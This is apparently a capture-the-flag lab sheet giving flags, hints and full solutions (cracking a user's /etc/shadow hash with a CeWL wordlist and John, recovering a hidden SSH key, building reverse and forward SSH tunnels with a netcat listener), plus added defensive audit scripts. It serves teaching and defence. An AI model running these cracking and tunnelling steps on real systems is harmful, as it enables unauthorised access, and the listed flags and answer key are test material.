Discovery 101
COG{17507e07-2f39-4b36-8843-bf304ee3ad1d}
10pts
In a large tome this flag is tightly bound. It isn't worth much because it's easily found. COG{}
Hint (1pt): solution: `grep COG *.txt`

Access 101
COG{17599eef-f2e6-4509-a2f2-c08d342134c7}
100pts
A single user system this is not. Can you crack the code and untie the knot?
Hint (1pt): hint: `sudo cat /etc/passwd`
Hint (1pt): hint: `sudo cat /etc/shadow`
Hint (1pt): hint: axel is your mark and john is your friend
Hint (1pt): hint: There sure are a lot of WORDS in this book. Make sure to not PASS your eyes over all of them
Hint (1pt): hint: Make a wordlist from heimskringla.txt, wouldn't that be cewl?
Hint (1pt): hint: Make sure to avoid the strong hash used for the 'student' user (65600 cycles is not fast)
Hint (5pt): solution:
```
sudo apt install cewl john
python -m SimpleHTTPServer &   # Python 2; on Python 3 use: python3 -m http.server &
cewl localhost:8000/heimskringla.txt -w words
sudo cat /etc/shadow | grep axel > axel-hash.txt
sudo john --wordlist=words axel-hash.txt
su axel # password from john
```

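The defender's counterpart to the hint about the 'student' hash, added here as an example and not part of the CTF material: an audit that parses shadow-format entries and flags the hashes a wordlist attack would get through (legacy DES, md5crypt, sha*crypt left at few rounds). `MIN_ROUNDS`, the function names and the sample lines are my own assumptions and constructions.

```python
"""Audit /etc/shadow-style entries for weak password hashes (added example,
not part of the CTF material). The hint above says 'student' uses a slow
sha512crypt with 65600 rounds while 'axel' is the crackable mark; this check
flags exactly the entries a wordlist attack would get through. Sample lines
are constructed; the salt and hash bodies are placeholders."""
import re

SCHEME_NAMES = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt"}
MIN_ROUNDS = 50000   # assumption: local policy floor for sha*crypt rounds

def audit_shadow_line(line):
    """Return (user, finding) for a weak entry, or None if it is fine."""
    fields = line.rstrip("\n").split(":")
    if len(fields) < 2:
        return None
    user, pw = fields[0], fields[1]
    if pw in ("", "*", "x") or pw.startswith("!"):
        return None              # locked, disabled, or stored elsewhere
    if not pw.startswith("$"):
        return (user, "legacy DES crypt: 8-char limit, trivially crackable")
    parts = pw.split("$")        # ['', id, [rounds=N,] salt, hash]
    scheme = parts[1]
    if scheme == "1":
        return (user, "md5crypt: obsolete and fast to brute-force")
    if scheme in ("5", "6"):
        m = re.match(r"rounds=(\d+)$", parts[2])
        rounds = int(m.group(1)) if m else 5000   # glibc default without rounds=
        if rounds < MIN_ROUNDS:
            return (user, f"{SCHEME_NAMES[scheme]} with only {rounds} rounds")
        return None
    if scheme in ("y", "7", "2b"):   # yescrypt, scrypt, bcrypt: acceptable
        return None
    return (user, f"unrecognised hash scheme '${scheme}$'")

def audit_shadow(text):
    """Audit a whole shadow file; returns weak entries in file order."""
    return [f for f in (audit_shadow_line(l) for l in text.splitlines()) if f]

SAMPLE_SHADOW = """root:*:19000:0:99999:7:::
student:$6$rounds=65600$SALTSALTSALTSALT$HASHPLACEHOLDER:19000:0:99999:7:::
axel:$6$SALTSALTSALTSALT$HASHPLACEHOLDER:19000:0:99999:7:::
legacy:XXXXXXXXXXXXX:19000:0:99999:7:::
svc:$1$SALTSALT$HASHPLACEHOLDER:19000:0:99999:7:::
"""

if __name__ == "__main__":
    for user, finding in audit_shadow(SAMPLE_SHADOW):
        print(f"{user}: {finding}")
```

Run it against `sudo cat /etc/shadow` output to see which accounts would fall to the same wordlist before a student does.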
Access 102
COG{175ae80e-051e-467f-8b0d-ee224af54574}
100pts
Wax on, wax off. SSH in, log out. Like sands through an hourglass these sessions come and go as fast as they were created.
Hint (1pt): hint: Watch for sessions coming or going from this machine
Hint (1pt): hint: Network (or socket) statistics or packet dumping are both great ways to find connections of interest
Hint (1pt): hint:
```
watch -n1 -d ss -antp
```
or
```
sudo tcpdump -ni ens3 not port 2222 and ip
```
Hint (5pt): solution: `ssh to axel@c2t2-000-crust -p 1863`


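The `watch ... ss -antp` hint done as code, added here as an example and not part of the CTF material: parse two `ss -antp` snapshots and report which connections appeared or vanished between them, hiding your own management session the same way the tcpdump hint excludes port 2222. The snapshots, hosts and PIDs are constructed; the function names are my own.

```python
"""Spot SSH sessions coming and going by diffing two `ss -antp` snapshots
(added example, not part of the CTF material). The snapshots below are
constructed; on a live host feed it two consecutive `sudo ss -antp` runs.
The own-session filter mirrors the `not port 2222` in the tcpdump hint."""
import re
from collections import namedtuple

Conn = namedtuple("Conn", "state local peer proc")
_PROC_RE = re.compile(r'users:\(\("([^"]+)",pid=(\d+)')

def parse_ss(text, ignore_port=None):
    """Parse `ss -antp` output into a set of non-listening connections."""
    conns = set()
    for line in text.splitlines()[1:]:          # first line is the header
        cols = line.split()
        if len(cols) < 5 or cols[0] == "LISTEN":
            continue
        state, local, peer = cols[0], cols[3], cols[4]
        if ignore_port is not None and (local.endswith(f":{ignore_port}")
                                        or peer.endswith(f":{ignore_port}")):
            continue                            # our own management session
        m = _PROC_RE.search(line)
        proc = f"{m.group(1)}/{m.group(2)}" if m else "?"
        conns.add(Conn(state, local, peer, proc))
    return conns

def diff_sessions(before, after):
    """Return (opened, closed) between two parsed snapshots."""
    return after - before, before - after

# Constructed snapshots: t0 has only our own session on port 2222,
# t1 adds an outbound ssh client to another host's port 1863.
SNAP_T0 = """State  Recv-Q Send-Q Local Address:Port  Peer Address:Port  Process
LISTEN 0      128    0.0.0.0:2222        0.0.0.0:*          users:(("sshd",pid=812,fd=3))
ESTAB  0      0      10.0.0.5:2222       192.168.1.20:50000 users:(("sshd",pid=1400,fd=4))
"""
SNAP_T1 = SNAP_T0 + """ESTAB  0      0      10.0.0.5:41002      10.0.0.7:1863      users:(("ssh",pid=2201,fd=3))
"""

if __name__ == "__main__":
    opened, closed = diff_sessions(parse_ss(SNAP_T0, 2222), parse_ss(SNAP_T1, 2222))
    for c in opened:
        print(f"NEW  {c.local} -> {c.peer} ({c.proc})")
    for c in closed:
        print(f"GONE {c.local} -> {c.peer} ({c.proc})")
```

Polling this every second is what the `watch -n1 -d` line does by eye; the process column needs `sudo` to show other users' PIDs.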
Discovery 201
Preq: Access 102
COG{1750b2c3-a053-4c68-9da8-26e4a6ade0d7}
100pts
Find the ssh private key hidden on crust. The professor thought it was punny to hide his key in a "shared" file.
Hint (1pt): hint: A shared library or shared object is a file that is intended to be shared by executable files and further shared object files.
Hint (1pt): hint: You will need to `find` the file somewhere on the filesystem. `proc` and `sys` can be ignored.
Hint (1pt): hint: Filter out all the .so files whose `file` type is the expected one
Hint (1pt): hint: When you find the key the flag will be inside the key (`man ssh-keygen`)
Hint (5pt): solution: this is an example solution, there are lots of possibilities:

`find / -type f 2>/dev/null | grep ".so$" | xargs -I {} -P0 file {} | egrep -v "ELF|ASCII|python|terminfo"`
`ssh-keygen -l -f <FILE>`

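The `find | file | egrep -v` pipeline above, rewritten as a hunting script (added example, not part of the CTF material): instead of trusting `file`'s description it checks the ELF magic directly, prunes the pseudo-filesystems the hint says to ignore, and calls out a PEM-style private key hiding behind a `.so` name. The fixture tree and the `SKIP_DIRS` list are my own constructions.

```python
"""Hunt for files named like shared objects that are not ELF binaries
(added example, not part of the CTF material). A real .so starts with the
ELF magic; anything else under a library path deserves a look, and a PEM
style private key is an outright finding. The fixture tree is constructed."""
import os
import tempfile

ELF_MAGIC = b"\x7fELF"
SKIP_DIRS = {"/proc", "/sys", "/dev", "/run"}   # pseudo-filesystems, per the hint

def classify_so(path):
    """Return None for a genuine ELF object, otherwise a short verdict."""
    try:
        with open(path, "rb") as fh:
            head = fh.read(4096)
    except OSError:
        return None                  # unreadable: same as the 2>/dev/null above
    if head.startswith(ELF_MAGIC):
        return None
    if b"-----BEGIN " in head and b"PRIVATE KEY-----" in head:
        return "private key disguised as a shared object"
    return "non-ELF file with a shared-object name"

def scan_fake_so(root="/"):
    """Walk root, pruning pseudo-filesystems, and list suspicious .so files."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            if name.endswith(".so") or ".so." in name:   # libfoo.so, libfoo.so.1
                verdict = classify_so(os.path.join(dirpath, name))
                if verdict:
                    findings.append((os.path.join(dirpath, name), verdict))
    return sorted(findings)

def build_fixture():
    """Constructed tree: one ELF stub and one key hidden behind a .so name."""
    root = tempfile.mkdtemp()
    lib = os.path.join(root, "usr", "lib", "x86_64-linux-gnu")
    os.makedirs(lib)
    with open(os.path.join(lib, "libreal.so.1"), "wb") as fh:
        fh.write(ELF_MAGIC + b"\x02\x01\x01" + b"\0" * 60)
    with open(os.path.join(lib, "libhidden.so"), "w") as fh:
        fh.write("-----BEGIN OPENSSH PRIVATE KEY-----\nPLACEHOLDER\n"
                 "-----END OPENSSH PRIVATE KEY-----\n")
    return root
```

`scan_fake_so()` with the default root walks the whole host; `scan_fake_so(build_fixture())` exercises it on the constructed tree.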
Access 201
Preq: Access 102
COG{17515afd-0444-4779-891a-e70607e2b3de}
Prof is like a ghost, but whoever finds him needn't boast. Just ssh to his favorite host!
Hint (1pt): hint: you may need to update the hostname that you find in the key (`c2t2-000-<hostname>`)
Hint (5pt): solution: `ssh lindenbrock@c2t2-000-mantle -i <FILE FOUND IN Discovery 201>`

Discovery 202
Preq: Access 102
COG{1754b4be-80ce-4bba-ae5d-56c6cabde758}
Host enumeration is hard, good thing we don't have to clean these logs.
Hint (1pt): hint: Evaluating the logs on a system is critical to understanding what the system is being used for
Hint (1pt): hint: Read and understand the `rsyslog` configuration file
Hint (1pt): hint: Look for any logs which might be arriving from a remote host
Hint (5pt): solution: `sudo grep COG /var/log/c2t2-*`

Tunnels 301
Preq: Access 201
COG{17576080-45d6-4b9f-9084-533ca9710548}
Looks like the Prof has `mantle` locked down tight, maybe that remote log could shed some light.
hint: Looks like something is knocking, knocking on this bastion door
hint: Maybe it's a message, coming from the core
hint: Just because you can't get a login shell on this box doesn't mean ssh isn't useful! What else can we do with ssh?
hint: What is different about the sshd config which is coming back from mantle?
hint: `man ssh` is your friend. I like the `-N` and the `-T` flags the most. Also something something `GatewayPorts`
hint: Use the netstat output, which is also getting logged, to troubleshoot a port forward; what direction should a port forward go?
hint: Reverse ssh port forwarding: `-R <remote listening interface IP>:<remote listening port>:<local interface IP>:<local port>`
hint: `-R 0.0.0.0:1337:localhost:1337 -v`
hint: Don't forget to set up something to listen for the inbound connection, `netcat` is always fun.
hint: on crust (separate window): `nc -l -p 1337`
solution: `ssh lindenbrock@c2t2-001-mantle -i /usr/lib/x86_64-linux-gnu/coreutils/libstdkey.so -NT -R 0.0.0.0:1337:localhost:1337 -v`


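The "what is different about the sshd config" hint, from the administrator's side (added example, not part of the CTF material): a small audit of the sshd_config keywords that decide whether a `-R 0.0.0.0:1337:...` forward can bind to every interface. It applies sshd's first-value-wins rule, so a `GatewayPorts no` appended below an earlier `yes` is correctly reported as ineffective. Both configs and the `CHECKS` table are my own constructions.

```python
"""Audit the sshd_config forwarding settings the reverse forward above
relies on (added example, not part of the CTF material). sshd keeps the
FIRST value it reads for a keyword, so a hardening line appended at the end
of the file changes nothing; both configs below are constructed."""
import re

CHECKS = {  # keyword: (sshd default, acceptable values, what "yes" allows)
    "gatewayports": ("no", {"no"}, "-R listeners bind to all interfaces"),
    "allowtcpforwarding": ("yes", {"no", "local"}, "-L/-R tunnels through host"),
}

def effective_settings(text):
    """First-match-wins view of the global section; parsing stops at the
    first Match block (assumption: conditional blocks are reviewed apart)."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):     # sshd honours whole-line comments only
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)   # 'Key value' or 'Key=value'
        key = parts[0].lower()
        if key == "match":
            break
        settings.setdefault(key, parts[1].strip().lower() if len(parts) > 1 else "")
    return settings

def audit_sshd_config(text):
    """Return [(keyword, effective value, why)] for settings outside policy."""
    settings = effective_settings(text)
    return [(key, settings.get(key, default), why)
            for key, (default, ok, why) in CHECKS.items()
            if settings.get(key, default) not in ok]

PERMISSIVE = """Port 22
GatewayPorts yes
AllowTcpForwarding yes
# added later in a hurry; ignored because the first value wins
GatewayPorts no
"""
HARDENED = """Port 22
GatewayPorts no
AllowTcpForwarding no
Match User lindenbrock
    AllowTcpForwarding local
"""

if __name__ == "__main__":
    for key, value, why in audit_sshd_config(PERMISSIVE):
        print(f"{key} = {value}: {why}")
```

`sshd -T` prints the effective configuration the daemon actually uses and is the authoritative cross-check for this parser.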
Tunnels 302
Preq: Tunnels 301
COG{175be632-d86a-46b2-93b9-a60e565fb4db}
After all this journey I hope the payoff is worth the effort. On the other side of this tunnel it all looked so easy.
Step inside the computer world...
hint: make sure to use the correct hostname and port to get to core -- via mantle
hint: Port forwarding works in the forward direction too, just not with the letter `F` -- it's `L` because the listening happens locally (not remote listening like with reverse forwarding, `R`)
hint: Forward ssh port forwarding: `-L <local listen ip>:<local listen port>:<remote target ip>:<remote target port>`
hint: `-L 22175:c2t2-000-core:22175 -v`
solution:
`ssh lindenbrock@c2t2-001-mantle -i /usr/lib/x86_64-linux-gnu/coreutils/libstdkey.so -NT -L 22175:c2t2-001-core:22175 -v`
`ssh localhost -p 22175`
(flag shown after you die)

COG{1758a9e1-22ae-4d41-8916-ccc98ec0edbf} - FEEDBACK FLAG Hidden and only given after the survey has been taken